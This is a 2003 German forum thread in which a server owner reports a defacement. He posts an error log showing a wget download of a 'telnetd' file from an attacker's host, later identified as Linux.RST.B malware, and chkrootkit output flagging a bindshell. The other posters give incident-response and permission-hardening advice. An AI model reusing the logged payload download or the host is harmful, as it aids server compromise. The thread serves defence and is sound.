wow, ich habe plötzlich ne neue Startseite...

Lesenswerte Artikel, Anleitungen und Diskussionen
flat-jack
Posts: 36
Joined: 2002-10-22 23:18

wow, ich habe plötzlich ne neue Startseite...

Post by flat-jack » 2003-07-16 10:39

Hallo Zusammen!

Unser Server wurde heute morgen um 6:15 gehackt! Jemand hat unsere index.php gelöscht und durch eine .html (mit einem Hack-blabla) ersetzt.

Folgender Error-log-Eintrag ist interessant, aber ich verstehe ihn (bin Newbie - sorry!) nicht:

Code: Select all

...
[Wed Jul 16 06:11:15 2003] [error] [client 80.131.126.137] File does not exist: /home/www/web1/html/bilder/blid.gif
--06:15:52--  http://www.hackerultimate.hpg.com.br/telnetd
           => `telnetd'
Resolving www.hackerultimate.hpg.com.br... done.
Connecting to www.hackerultimate.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]

    0K .......... .......... .......... .......... .......... 30%   44.68 KB/s
   50K .......... .......... .......... .......... .......... 60%  175.44 KB/s
  100K .......... .......... .......... .......... .......... 90%  177.30 KB/s
  150K .......... ......                                     100%    8.11 MB/s

06:15:55 (98.71 KB/s) - `telnetd' saved [170613/170613]

[Wed Jul 16 06:22:33 2003] [error] [client 200.158.24.145] File does not exist: /home/www/web1/html/index.htm
...
ok, also Apache hat die URL ausgeführt und von dort diese Telnet-Client geladen. Nur, wie schafft man es, unseren Apache dazu zu bewegen???

Gefunden habe ich den (telnetd) in einem unterverzeichnis von meinem Forum (dieses braucht Verzeichnis-Rechte 777).

Es befanden sich mehrere warez-Dateien in dem Ordner, die ich gelöscht habe...
Traffic ist bisher kein nennenswerter angefallen.


Es handelt sich um ein (von 1&1) installiertes Suse 8.1 mit Confixx2Pro.

Was sollte ich am besten als nächstes tun?
Der Aufwand mit einer Anzeige lohnt sich meiner meinung nach nicht und herunterfahren (oder ins Resque) möchte ich das System nicht, da ich froh bin, endlich mal ein paar mehr Seitenzugriffe zu haben...

Gruß, Danke!
Flat-Jack

standbye
Posts: 146
Joined: 2002-10-16 18:05
Location: daheim :)

Re: wow, ich habe plötzlich ne neue Startseite...

Post by standbye » 2003-07-16 10:44

<paranioa>
runterfahren und zwar sofort!!!


du weist nich wieviele hintertüren sie sonst noch eingbaut haben wie hier scho öfters gesagt ->

recsue system alle logs sichern, chrootkit drüberlaufen lassen dann mal alle pws ändern oder am besten gleich neu initialisieren -> nachdem dun backup gemacht hast

so wies aussieht hatten sie zwar nur rechte von deinem apachen können aber sicher noch woanderst dateien abgelegt haben die du nicht gefunden hast -> evtl auch den attack nochmal machen
</paranioa>

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: wow, ich habe plötzlich ne neue Startseite...

Post by dodolin » 2003-07-16 11:00

Nur, wie schafft man es, unseren Apache dazu zu bewegen???
Bei
Gefunden habe ich den (telnetd) in einem unterverzeichnis von meinem Forum (dieses braucht Verzeichnis-Rechte 777).
wundert mich das nicht sonderlich viel. Wie oft hatte ich doch hier in den Foren gleich nochmal geschrieben, dass es NIE einen Grund gibt, warum man etwas auf 777 oder Schreibrechte für others setzen sollte?!

flat-jack
Posts: 36
Joined: 2002-10-22 23:18

Re: wow, ich habe plötzlich ne neue Startseite...

Post by flat-jack » 2003-07-16 11:10

ok, keine 777-verzeichnis-rechte mehr...

Also, der Server ist frisch neu installiert worden - ich würde das ungern alles nochmal einrichten müssen.

chroot-kit meldet alles ok, außer:

Code: Select all

...
Checking `bindshell'... INFECTED (PORTS:  465)
...
Das müsste doch ohne komplette Neuinitialisierung zu beheben sein, oder?


Danke für die Hilfe...
Gruß
Flat-Jack

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: wow, ich habe plötzlich ne neue Startseite...

Post by captaincrunch » 2003-07-16 11:14

Guter Rat : Neuinstallation ist das schnellste und sicherste in deiner Lage.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

coolsurfer
Posts: 61
Joined: 2002-05-01 18:16

Re: wow, ich habe plötzlich ne neue Startseite...

Post by coolsurfer » 2003-07-16 11:30

Hallo,

nur um Dich ein wenig nervös zu machen:

telnetd von dem von Dir genannten Server mag vielleicht (!)
auch ein "Telnet-Server" sein, in erster Linie ist es aber ein "Linux.RST.B"

-> http://securityresponse.symantec.com/av ... 10739.html
-> http://www.sophos.com/virusinfo/analyses/linuxrstb.html
-> http://www.sophos.de/virusinfo/analyses/linuxrstb.html

coolsurfer

flat-jack
Posts: 36
Joined: 2002-10-22 23:18

Re: wow, ich habe plötzlich ne neue Startseite...

Post by flat-jack » 2003-07-16 11:48

ausgeführt habe ich den aber nicht, sonder direkt gelöscht - mein System sollte eigentlich nicht infiziert sein, oder?
Wenn doch, wo bekomme ich denn einen virenscanner? Habe da bisher nicht viel gefunden - ist ja eigentlich ein Thema der Windows-Welt! :?

Gruß
Flat-Jack

sascha
RSAC
Posts: 1345
Joined: 2002-04-22 23:08

Re: wow, ich habe plötzlich ne neue Startseite...

Post by sascha » 2003-07-16 11:50

Ja du hast ihn nicht ausgeführt aber dein "Gast".

Ich würde dir wärmstens eine Reinitialisierung empfehlen.

pg-computer
Posts: 144
Joined: 2002-09-27 19:28
Location: Drebach / Erzgebirge

Re: wow, ich habe plötzlich ne neue Startseite...

Post by pg-computer » 2003-07-16 11:56

Hoi Hoi,

mensch mensch, ich will ja nichts sagen, aber sowas betreibt RootServer... ein ganz klein wenig Ahnung..

Es gibt auch in der Unix Welt div. Backdoors usw. dich geht das also schon was an, da es sich hier um einen Schädling aus der Linux / Unix Welt handelt...
Der Aufwand mit einer Anzeige lohnt sich meiner meinung nach nicht und herunterfahren (oder ins Resque) möchte ich das System nicht, da ich froh bin, endlich mal ein paar mehr Seitenzugriffe zu haben...
und wenn ich sowas les, kommt mir die Galle hoch...
der Server gehört sofort in den Rescue Modus, egal ob du nun Seitenzugriffe hast oder nicht, du stellst damit eine potentielle Gefahr für andere dar. Gut, dass das nicht mein Ausbilder liest, der hätte noch verrücktere Kommentare dazu abgegeben! ;)

Da ich aber nicht nur "schimpfen" will...
Kann mich meinen Vorrednern nur anschließen..
wie gesagt, Server schnellstmöglichst ins Rescue System und dann div. Logfiles sichern und auswerten, was noch übrig ist.
Dann eine Neuinstallation des Server veranlassen und regelmäßig Security Patches, etc. einspielen... ich möchte es an dieser Stelle auch nochmal betonen, ein RootServer ist kein Spielzeug, sondern durch seine Anbindung eine potentielle Waffe des Internets.

Gruß

PG-Computer

flat-jack
Posts: 36
Joined: 2002-10-22 23:18

Re: wow, ich habe plötzlich ne neue Startseite...

Post by flat-jack » 2003-07-16 12:36

ok, überzeugt, Server wird jetzt neu initialisiert...

Was muss ich beim Sichern beachten? Möchte ja nicht den Virus gleich wieder aufs neue System zurückspielen - aber meine files (sind ja alles keine Ausführbaren (ausser .cgi) muss ich natürlich sichern können...?

Ich tue was ich kann um zu lernen... Server war (mit YOU) stets auf dem neuesten Stand - der einzige Fehler war wohl das 777 Verzeichnis!


Gruß
Flat-Jack

pupsi
Posts: 32
Joined: 2003-06-09 03:44

Re: wow, ich habe plötzlich ne neue Startseite...

Post by pupsi » 2003-07-16 13:00

Wie oft hatte ich doch hier in den Foren gleich nochmal geschrieben, dass es NIE einen Grund gibt, warum man etwas auf 777 oder Schreibrechte für others setzen sollte?!
Jetzt muss ich Laie in Sachen PHP eine doofe Frage stellen:

Bei manchen Scripten steht da, geben Sie der Datei oder dem Verzeichniss chmod 777.

Reichen denn da 775 Rechte aus, damit diese Scripte einwandfrei laufen oder gibt es unterschiedliche Scripte, die weniger anfällig sind, wenn Dateien für alle freigegeben sind?

Ich hab nämlich jetzt ein bisschen Angst bekommen 8O

Ich bitte die Profis um Aufklärung.

Gruß Pupsi

Nachtrag: Gilt das auch für gekauften Webspace? Was ist dort anders als auf einem Rootserver mit aktuellen Sicherheitspatches?

giffi
Posts: 140
Joined: 2003-05-17 14:52

Re: wow, ich habe plötzlich ne neue Startseite...

Post by giffi » 2003-07-16 13:40

Pupsi wrote:
Wie oft hatte ich doch hier in den Foren gleich nochmal geschrieben, dass es NIE einen Grund gibt, warum man etwas auf 777 oder Schreibrechte für others setzen sollte?!
Jetzt muss ich Laie in Sachen PHP eine doofe Frage stellen:

Bei manchen Scripten steht da, geben Sie der Datei oder dem Verzeichniss chmod 777.
Das frage ich mich auch gerade!? Zum Beispiel Forenscripte
die für den Avatar-Upload Schreibrechte in einem Ordner brauchen
oder halt sonstige Uploadscripte.

Giffi

sascha
RSAC
Posts: 1345
Joined: 2002-04-22 23:08

Re: wow, ich habe plötzlich ne neue Startseite...

Post by sascha » 2003-07-16 14:05

Am besten PHP Scripte als CGI unter der jeweiligen UID laufen lassen. Dann hat man dieses Problem schonmal nicht.

mutombo
Posts: 184
Joined: 2003-06-19 06:10

Re: wow, ich habe plötzlich ne neue Startseite...

Post by mutombo » 2003-07-16 16:50

ein chroot für den webserver ist hier auch sehr zu empfehlen.

besondere vorsicht gilt außerdem bei den ganzen php-CMS'en, besonders phpnuke, dort sollte man immer sehr sorgfältig permissions checken, updates und fixes einspielen und bei der moduleauswahl auch nochmal nen blick über bugtraq wandern lassen.

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: wow, ich habe plötzlich ne neue Startseite...

Post by captaincrunch » 2003-07-16 16:58

Auch ein chroot allein wiegt mehr in Sicherheit, als das es etwas nutzt, da mittlerweile selbst schon Scriptkiddies Mittel und Wege kennen, aus dem chroot auszubrechen ... in Verbindung mit GRSecurity und geeigneter Konfiuration des Patchs sieht die Sache allerdings schon wieder ganz anders aus.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

lufthansen
Posts: 390
Joined: 2002-09-24 17:31
Location: NRW

Re: wow, ich habe plötzlich ne neue Startseite...

Post by lufthansen » 2003-07-16 20:51

hmm welche foren soft hast du den laufen ?
und wie briegt man den apache dazu ein prog zu ziehen das muß doch ein bug in dem foren script sein oder ?

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: wow, ich habe plötzlich ne neue Startseite...

Post by dodolin » 2003-07-17 00:22

Bei manchen Scripten steht da, geben Sie der Datei oder dem Verzeichniss chmod 777.
Das Thema hatten wir schon öfters, z.B. in http://www.rootforum.org/forum/viewtop ... =777#83309

Wenn ich sowas bei einem Skript lesen würde, wäre mein erster Schritt, das Skript in die Tonne zu treten.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wow, ich habe plötzlich ne neue Startseite...

Post by Joe User » 2003-07-17 16:15

Moin,
PG-Computer wrote: ...
wie gesagt, Server schnellstmöglichst ins Rescue System und dann div. Logfiles sichern und auswerten, was noch übrig ist.
...
wozu Logfiles sichern? Die sind schliesslich das Erste, was ich faken/löschen würde, wenn ich illegalerweise in ein System eingedrungen wäre...
Ansonsten ACK.

Gruss,
Markus

dea
RSAC
Posts: 619
Joined: 2002-08-13 12:05

Re: wow, ich habe plötzlich ne neue Startseite...

Post by dea » 2003-07-17 17:34

Joe User wrote:Moin,
PG-Computer wrote: ...
wie gesagt, Server schnellstmöglichst ins Rescue System und dann div. Logfiles sichern und auswerten, was noch übrig ist.
...
wozu Logfiles sichern? Die sind schliesslich das Erste, was ich faken/löschen würde, wenn ich illegalerweise in ein System eingedrungen wäre...
Ansonsten ACK.

Gruss,
Markus
Du glaubst garnicht, wie blöd manche SKs sind ... *lol*

c14l
Posts: 31
Joined: 2002-12-24 09:37

Re: wow, ich habe plötzlich ne neue Startseite...

Post by c14l » 2003-07-17 19:17

Hallo Ihr C14L-nervös-macher! ;)

Ich bin mir zwar ziemlich sicher, keine 777 directories zu haben, aber ich würd das ja lieber gern mal checken. Nur falls jemand das grad aus dem Kopf hier hinzaubern kann: wie kann ich denn das gesamte "www"-verzeichnis rekursiv nach Dateien mit 777-permissions durchsuchen?

Was ich allerdings nicht ganz verstehe: Kann man den Apachen wirklich dazu bringen, eine Datei von irgentwo runterzuladen oder war es irgentein script und ich habs nur überlesen? Und wieso taucht das Ding im Error-Log auf?

firefox747
Posts: 52
Joined: 2002-08-22 12:37

Re: wow, ich habe plötzlich ne neue Startseite...

Post by firefox747 » 2003-07-17 19:21

find /path/to/www -perm 777

c14l
Posts: 31
Joined: 2002-12-24 09:37

Re: wow, ich habe plötzlich ne neue Startseite...

Post by c14l » 2003-07-17 19:57

Klasse. Danke dir Firefox747! :)

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: wow, ich habe plötzlich ne neue Startseite...

Post by Joe User » 2003-07-17 20:12

Moin,
C14L wrote: wie kann ich denn das gesamte "www"-verzeichnis rekursiv nach Dateien mit 777-permissions durchsuchen?
cd /path/to/www && ls -alhR | grep rwxrwxrwx | less
C14L wrote: Was ich allerdings nicht ganz verstehe: Kann man den Apachen wirklich dazu bringen, eine Datei von irgentwo runterzuladen oder war es irgentein script und ich habs nur überlesen?
Hint1: mod_proxy
Hint2: mod_$SCRIPTINTERPRETER
Hint3: buggy Scripte ala phpNuke
Hint4: unzureichendes Sicherheitskonzept
Hint5: bugtraq abonnieren und lesen
Hint6: ...
C14L wrote: Und wieso taucht das Ding im Error-Log auf?
ScriptKiddie am Werk...

HTH,
Markus

Anonymous

777 ?

Post by Anonymous » 2003-07-18 10:00

giffi wrote: Das frage ich mich auch gerade!? Zum Beispiel Forenscripte
die für den Avatar-Upload Schreibrechte in einem Ordner brauchen
oder halt sonstige Uploadscripte.

Giffi
Halloa,

-->Wie muss ich nun vorgehen wenn zB mein Forum einen 777 Ordner benötigt (Upload von Avatar)?

-> Habe noch kollegen auf dem Server, was ist wenn die einen Ordner mit den Rechten 777 erstellen? Kann man dies irgendwie überblicken, bzw. schützen?

Danke für eure Infos

Zimtstern

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: wow, ich habe plötzlich ne neue Startseite...

Post by captaincrunch » 2003-07-18 10:24

-->Wie muss ich nun vorgehen wenn zB mein Forum einen 777 Ordner benötigt (Upload von Avatar)?
Wie schon desöfteren hier gesagt : ein vernünftiges Forum suchen, oder so etwas sinnfreies weglassen
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc